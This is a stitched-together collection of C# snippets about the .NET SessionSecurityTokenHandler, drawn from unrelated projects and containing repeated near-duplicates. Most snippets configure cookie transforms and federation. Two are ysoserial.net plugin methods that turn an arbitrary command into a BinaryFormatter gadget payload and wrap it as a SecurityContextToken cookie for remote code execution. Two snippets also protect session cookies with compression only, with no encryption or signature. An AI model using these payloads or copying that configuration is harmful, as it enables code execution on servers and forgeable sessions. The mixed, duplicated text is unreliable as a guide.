private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
var sessionTransforms = new List <CookieTransform>(new CookieTransform[] { new DeflateCookieTransform() });
var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly());
e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
}
void WriteSessionToken(XmlWriter writer, SessionSecurityToken sessionToken)
{
SessionSecurityTokenHandler ssth = GetOrCreateSessionSecurityTokenHandler();
XmlDictionaryWriter dictionaryWriter = XmlDictionaryWriter.CreateDictionaryWriter(writer);
ssth.WriteToken(dictionaryWriter, sessionToken);
}
public object Run(string[] args)
{
List <string> extra;
try
{
extra = options.Parse(args);
}
catch (OptionException e)
{
Console.Write("ysoserial: ");
Console.WriteLine(e.Message);
Console.WriteLine("Try 'ysoserial --help' for more information.");
System.Environment.Exit(-1);
}
String payloadValue = "";
string payload = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc' Id='uuid-709ab608-2004-44d5-b392-f3c5bf7c67fb-1'>
<Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
urn:unique-id:securitycontext:1337
</Identifier>
<Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>{0}</Cookie>
</SecurityContextToken>";
if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
{
Console.Write("ysoserial: ");
Console.WriteLine("Incorrect plugin mode/arguments combination");
Console.WriteLine("Try 'ysoserial --help' for more information.");
System.Environment.Exit(-1);
}
byte[] serializedData = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false);
DeflateCookieTransform myDeflateCookieTransform = new DeflateCookieTransform();
ProtectedDataCookieTransform myProtectedDataCookieTransform = new ProtectedDataCookieTransform();
byte[] deflateEncoded = myDeflateCookieTransform.Encode(serializedData);
byte[] encryptedEncoded = myProtectedDataCookieTransform.Encode(deflateEncoded);
payload = String.Format(payload, Convert.ToBase64String(encryptedEncoded));
if (test)
{
// PoC on how it works in practice
try
{
XmlReader tokenXML = XmlReader.Create(new StringReader(payload));
SessionSecurityTokenHandler mySessionSecurityTokenHandler = new SessionSecurityTokenHandler();
mySessionSecurityTokenHandler.ReadToken(tokenXML);
}
catch (Exception e)
{
// there will be an error!
}
}
return(payload);
}
public IClaimsSetupContext MakeClaimsAware <T>(SessionSecurityTokenHandler tokenHandler = null) where T : ClaimsAuthenticationManager
{
if (PassiveFederationInitialized)
{
throw new InvalidOperationException("Application is already made claims aware");
}
Application.ConfigurePassiveFederation <T>(tokenHandler);
PassiveFederationInitialized = true;
return(this);
}
public static void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
List<CookieTransform> sessionTransforms = new List<CookieTransform>(new CookieTransform[] {
new DeflateCookieTransform(),
new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate),
new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate)
});
SessionSecurityTokenHandler sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly());
e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
}
public static void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
List <CookieTransform> sessionTransforms = new List <CookieTransform>(new CookieTransform[] {
new DeflateCookieTransform(),
new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate),
new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate)
});
SessionSecurityTokenHandler sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly());
e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
}
/// <summary>
/// The lifetime of the session is defaulted unless provided by the SessionSecurityTokenHandler.
/// </summary>
TimeSpan GetSessionLifetime()
{
TimeSpan lifetime = SessionSecurityTokenHandler.DefaultTokenLifetime;
SessionSecurityTokenHandler ssth = _serviceConfiguration.SecurityTokenHandlers[typeof(SessionSecurityToken)] as SessionSecurityTokenHandler;
if (ssth != null)
{
lifetime = ssth.TokenLifetime;
}
return(lifetime);
}
private static SessionSecurityTokenHandler GetOrCreateSessionSecurityTokenHandler()
{
SecurityTokenHandlerCollection defaultHandlers = SecurityTokenHandlerCollection.CreateDefaultSecurityTokenHandlerCollection();
SessionSecurityTokenHandler ssth = defaultHandlers[typeof(SessionSecurityToken)] as SessionSecurityTokenHandler;
if (ssth == null)
{
ssth = new SessionSecurityTokenHandler();
defaultHandlers.AddOrReplace(ssth);
}
return(ssth);
}
void OnServiceConfigurationCreated(object sender, FederationConfigurationCreatedEventArgs e)
{
// Change cookie encryption type from DPAPI to RSA. This avoids a security exception due to a cookie size limit with the SSO cookie. See http://fabriccontroller.net/blog/posts/key-not-valid-for-use-in-specified-state-exception-when-working-with-the-access-control-service/
var sessionTransforms = new List <CookieTransform>(new CookieTransform[] {
new DeflateCookieTransform(),
new RsaEncryptionCookieTransform(e.FederationConfiguration.ServiceCertificate),
new RsaSignatureCookieTransform(e.FederationConfiguration.ServiceCertificate)
});
var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly());
e.FederationConfiguration.IdentityConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
}
void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
// Use the <serviceCertificate> to protect the cookies that are sent to the client
List<CookieTransform> sessionTransforms =
new List<CookieTransform>(
new CookieTransform[]
{
new DeflateCookieTransform(),
new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate),
new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate)
});
var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly());
e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
}
void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
// Use the <serviceCertificate> to protect the cookies that are sent to the client
List <CookieTransform> sessionTransforms =
new List <CookieTransform>(
new CookieTransform[]
{
new DeflateCookieTransform(),
new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate),
new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate)
});
var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly());
e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
}
/// <summary>
/// Helper method to setup the WrappedSecureConversttion
/// </summary>
SecurityTokenAuthenticator SetupSecureConversationWrapper(RecipientServiceModelSecurityTokenRequirement tokenRequirement, SessionSecurityTokenHandler tokenHandler, out SecurityTokenResolver outOfBandTokenResolver)
{
// This code requires Orcas SP1 to compile.
// WCF expects this securityTokenAuthenticator to support:
// 1. IIssuanceSecurityTokenAuthenticator
// 2. ICommunicationObject is needed for this to work right.
// WCF opens a listener in this STA that handles the nego and uses an internal class for negotiating the
// the bootstrap tokens. We want to handle ValidateToken to return our authorization policies and surface the bootstrap tokens.
// when sp1 is installed, use this one.
//SecurityTokenAuthenticator sta = base.CreateSecureConversationTokenAuthenticator( tokenRequirement as RecipientServiceModelSecurityTokenRequirement, _saveBootstrapTokensInSession, out outOfBandTokenResolver );
// use this code if SP1 is not installed
SecurityTokenAuthenticator sta = base.CreateSecurityTokenAuthenticator(tokenRequirement, out outOfBandTokenResolver);
SessionSecurityTokenHandler sessionTokenHandler = tokenHandler;
//
// If there is no SCT handler here, create one.
//
if (tokenHandler == null)
{
sessionTokenHandler = new SessionSecurityTokenHandler(_cookieTransforms, SessionSecurityTokenHandler.DefaultTokenLifetime);
sessionTokenHandler.ContainingCollection = _securityTokenHandlerCollection;
sessionTokenHandler.Configuration = _securityTokenHandlerCollection.Configuration;
}
if (ServiceCredentials != null)
{
sessionTokenHandler.Configuration.MaxClockSkew = ServiceCredentials.IdentityConfiguration.MaxClockSkew;
}
SctClaimsHandler claimsHandler = new SctClaimsHandler(
_securityTokenHandlerCollection,
GetNormalizedEndpointId(tokenRequirement));
WrappedSessionSecurityTokenAuthenticator wssta = new WrappedSessionSecurityTokenAuthenticator(sessionTokenHandler, sta,
claimsHandler, _exceptionMapper);
WrappedTokenCache wrappedTokenCache = new WrappedTokenCache(_tokenCache, claimsHandler);
SetWrappedTokenCache(wrappedTokenCache, sta, wssta, claimsHandler);
outOfBandTokenResolver = wrappedTokenCache;
return(wssta);
}
/// <summary>
/// Initializes an instance of <see cref="WrappedRsaSecurityTokenAuthenticator"/>
/// </summary>
/// <param name="sessionTokenHandler">The sessionTokenHandler to wrap</param>
/// <param name="wcfSessionAuthenticator">The wcf SessionTokenAuthenticator.</param>
/// <param name="sctClaimsHandler">Handler that converts WCF generated IAuthorizationPolicy to <see cref="AuthorizationPolicy"/></param>
/// <param name="exceptionMapper">Converts token validation exception to SOAP faults.</param>
public WrappedSessionSecurityTokenAuthenticator(SessionSecurityTokenHandler sessionTokenHandler,
SecurityTokenAuthenticator wcfSessionAuthenticator,
SctClaimsHandler sctClaimsHandler,
ExceptionMapper exceptionMapper)
: base()
{
if (sessionTokenHandler == null)
{
throw DiagnosticUtility.ExceptionUtility.ThrowHelperArgumentNull("sessionTokenHandler");
}
if (wcfSessionAuthenticator == null)
{
throw DiagnosticUtility.ExceptionUtility.ThrowHelperArgumentNull("wcfSessionAuthenticator");
}
if (sctClaimsHandler == null)
{
throw DiagnosticUtility.ExceptionUtility.ThrowHelperArgumentNull("sctClaimsHandler");
}
if (exceptionMapper == null)
{
throw DiagnosticUtility.ExceptionUtility.ThrowHelperArgumentNull("exceptionMapper");
}
_issuanceSecurityTokenAuthenticator = wcfSessionAuthenticator as IIssuanceSecurityTokenAuthenticator;
if (_issuanceSecurityTokenAuthenticator == null)
{
throw DiagnosticUtility.ExceptionUtility.ThrowHelperInvalidOperation(SR.GetString(SR.ID4244));
}
_communicationObject = wcfSessionAuthenticator as ICommunicationObject;
if (_communicationObject == null)
{
throw DiagnosticUtility.ExceptionUtility.ThrowHelperInvalidOperation(SR.GetString(SR.ID4245));
}
_sessionTokenHandler = sessionTokenHandler;
_sctClaimsHandler = sctClaimsHandler;
_exceptionMapper = exceptionMapper;
}
private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
if (e.ServiceConfiguration.ServiceCertificate == null)
{
throw new ApplicationException("No site certificate; is it set up in web.config?");
// Make sure you've got the service certificate set up in the web.config:
// <serviceCertificate>
// <certificateReference x509FindType="FindByThumbprint" findValue="4653AE813BA15DFFB027E3AC147004B2D24F472B" />
// </serviceCertificate>
}
List<CookieTransform> sessionTransforms = new List<CookieTransform>(new CookieTransform[]
{
new DeflateCookieTransform(),
new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate),
new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate)
});
SessionSecurityTokenHandler sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly());
e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
}
void ChangeTokenHandler(SessionSecurityTokenHandler tokenHandler, IdentityConfiguration identitySettings)
{
var itemTOremove =
(from i in identitySettings.SecurityTokenHandlers
where i.GetType().Implements <SessionSecurityTokenHandler>() || i is SessionSecurityTokenHandler
select i).SingleOrDefault();
if (itemTOremove.IsInstance())
{
identitySettings.SecurityTokenHandlers.Remove(itemTOremove);
}
if (tokenHandler.IsInstance())
{
identitySettings.SecurityTokenHandlers.Add(tokenHandler);
}
else
{
identitySettings.SecurityTokenHandlers.Add(new MachineKeySessionSecurityTokenHandler());
}
Logging.DebugMessage("Configured Identity token handler");
}
private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
if (e.ServiceConfiguration.ServiceCertificate == null)
{
throw new ApplicationException("No site certificate; is it set up in web.config?");
// Make sure you've got the service certificate set up in the web.config:
// <serviceCertificate>
// <certificateReference x509FindType="FindByThumbprint" findValue="4653AE813BA15DFFB027E3AC147004B2D24F472B" />
// </serviceCertificate>
}
List <CookieTransform> sessionTransforms = new List <CookieTransform>(new CookieTransform[]
{
new DeflateCookieTransform(),
new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate),
new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate)
});
SessionSecurityTokenHandler sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly());
e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
}
/// <summary>
/// On Service Configuration Created
/// </summary>
/// <param name="sender">Sender</param>
/// <param name="e">Service Configuration Created Event Args</param>
private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
using (new PerformanceMonitor())
{
try
{
var sessionTransforms = new List <CookieTransform>(new CookieTransform[]
{
new DeflateCookieTransform(),
new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate),
new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate)
});
var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly());
e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
}
catch (ArgumentNullException aex)
{
logger.Log(aex, EventTypes.Error, (int)Fault.CertificateNotSpecified);
}
}
}
public object Run(string[] args)
{
InputArgs inputArgs = new InputArgs();
List <string> extra;
try
{
extra = options.Parse(args);
inputArgs.CmdFullString = command;
inputArgs.Minify = minify;
inputArgs.UseSimpleType = useSimpleType;
inputArgs.Test = test;
}
catch (OptionException e)
{
Console.Write("ysoserial: ");
Console.WriteLine(e.Message);
Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
System.Environment.Exit(-1);
}
String payloadValue = "";
string payload = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
<Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
urn:unique-id:securitycontext:1
</Identifier>
<Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>{0}</Cookie>
</SecurityContextToken>";
if (minify)
{
payload = XMLMinifier.Minify(payload, null, null);
}
if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
{
Console.Write("ysoserial: ");
Console.WriteLine("Incorrect plugin mode/arguments combination");
Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
System.Environment.Exit(-1);
}
byte[] serializedData = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
DeflateCookieTransform myDeflateCookieTransform = new DeflateCookieTransform();
ProtectedDataCookieTransform myProtectedDataCookieTransform = new ProtectedDataCookieTransform();
byte[] deflateEncoded = myDeflateCookieTransform.Encode(serializedData);
byte[] encryptedEncoded = myProtectedDataCookieTransform.Encode(deflateEncoded);
payload = String.Format(payload, Convert.ToBase64String(encryptedEncoded));
if (test)
{
// PoC on how it works in practice
try
{
XmlReader tokenXML = XmlReader.Create(new StringReader(payload));
SessionSecurityTokenHandler mySessionSecurityTokenHandler = new SessionSecurityTokenHandler();
mySessionSecurityTokenHandler.ReadToken(tokenXML);
}
catch
{
// there will be an error!
}
}
if (minify)
{
payload = XMLMinifier.Minify(payload, null, null);
}
return(payload);
}
public static void ConfigurePassiveFederation <TAuth, TCache>(this HttpApplication application, SessionSecurityTokenHandler tokenHandler)
where TAuth : ClaimsAuthenticationManager
where TCache : SessionSecurityTokenCache
{
if (WebServerConfiguration.IsConfiguredAsWebFront)
{
Logging.DebugMessage("Stardust web requirements configured");
}
lock (Triowing)
{
AuthorizationManager = typeof(TAuth);
CahceModule = typeof(TCache);
}
Logging.DebugMessage("Managers added to initializer");
application.ConfigurePassiveFederation(tokenHandler);
}
public static void ConfigurePassiveFederation <T>(this HttpApplication application, SessionSecurityTokenHandler tokenHandler) where T : ClaimsAuthenticationManager
{
Logging.DebugMessage("Initializing Stardust...");
SetClaimsManager <T>();
Logging.DebugMessage("Claims manager set");
application.ConfigurePassiveFederation(tokenHandler);
}
public static void ConfigurePassiveFederation(this HttpApplication application, SessionSecurityTokenHandler tokenHandler)
{
using (ContainerFactory.Current.ExtendScope(Scope.Context))
{
Logging.DebugMessage("Initializing Runtime");
var runtime = CreateRuntime();
Logging.DebugMessage("Runtime initialized");
var settings = GetSettings(runtime);
Logging.DebugMessage("Settings obtained");
var rootUrl = GetRootUrl(runtime);
Logging.DebugMessage("Root url obtained");
DisableChainValidation(settings);
Logging.DebugMessage("Chain validation set");
ConfigureIdentitySettings(settings, rootUrl, tokenHandler);
Logging.DebugMessage("Identity settins configured");
AddAudience(settings, rootUrl);
Logging.DebugMessage("Audience added");
if (!FederatedAuthentication.FederationConfiguration.IsInitialized)
{
FederatedAuthentication.FederationConfiguration.Initialize();
Logging.DebugMessage("Federated authentication initialized");
}
Logging.DebugMessage("Configuration completed");
}
}
private static void ConfigureIdentitySettings(IdentitySettings settings, string rootUrl, SessionSecurityTokenHandler tokenHandler)
{
GetStsSettingsFromEnvironment(settings);
var identitySettings = ConfigureWithExternalModules();
SetIssuer(settings, identitySettings);
SetCertificateValidationMode(settings, identitySettings);
ChangeTokenHandler(tokenHandler, identitySettings);
ConfigureFederationSettings(settings, rootUrl);
if (FederatedAuthentication.SessionAuthenticationModule.IsInstance())
{
FederatedAuthentication.SessionAuthenticationModule.IsReferenceMode = true;
}
ThumbprintResolver.RegisterWeb(identitySettings);
}
private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
var sessionTransforms = new List<CookieTransform>(new CookieTransform[] { new DeflateCookieTransform() });
var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly());
e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
}
